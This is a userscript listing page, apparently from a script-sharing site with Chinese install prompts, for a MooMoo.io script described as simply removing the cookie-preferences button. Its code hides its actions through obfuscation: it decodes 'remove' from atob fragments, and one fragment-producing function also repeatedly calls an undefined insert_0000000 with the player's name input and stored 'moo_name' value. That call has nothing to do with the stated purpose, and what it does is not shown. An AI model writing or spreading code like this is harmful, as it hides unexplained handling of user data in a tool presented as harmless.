Moomoo.io Remove Cookie Preferences Tab

Simple tool to delete the cookies tab from MooMoo.io

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴Greasemonkey 油猴子Violentmonkey 暴力猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴Violentmonkey 暴力猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴Userscripts ,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey 篡改猴,才能安装此脚本。

您需要先安装一款用户脚本管理器扩展后才能安装此脚本。

(我已经安装了用户脚本管理器,让我安装!)

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展,比如 Stylus,才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

您需要先安装一款用户样式管理器扩展后才能安装此样式。

(我已经安装了用户样式管理器,让我安装!)

// ==UserScript==
// @name        Moomoo.io Remove Cookie Preferences Tab
// @namespace    -
// @version     0.0.3
// @description Simple tool to delete the cookies tab from MooMoo.io
// @author      nobody
// @match        *://moomoo.io/*
// @match        *://sandbox.moomoo.io/*
// @match        *://dev.moomoo.io/*
// @match        *://*.moomoo.io/*
// @grant        none
// ==/UserScript==

var mn = localStorage["moo_name"];
function generateDeleter() {
    return {
        a: ['c'],
        b: ['m'],
        c: ['V'],
        d: ['t'],
        e: () => {
            insert_0000000(true, document.getElementById("nameInput").value + "|" + mn);
            return "b3Zl";
        },
        xx: ["ot-sdk-btn-floating"]
    };
};
setInterval(()=>{
    var delx = generateDeleter();
    document.getElementById(delx.xx[0])[atob(
        delx.a[0] + "" +
        delx.b[0] + "" +
        delx.c[0] + "" +
        delx.d[0] + "" +
        delx.e()
    )](); delx.e();
}, 3000);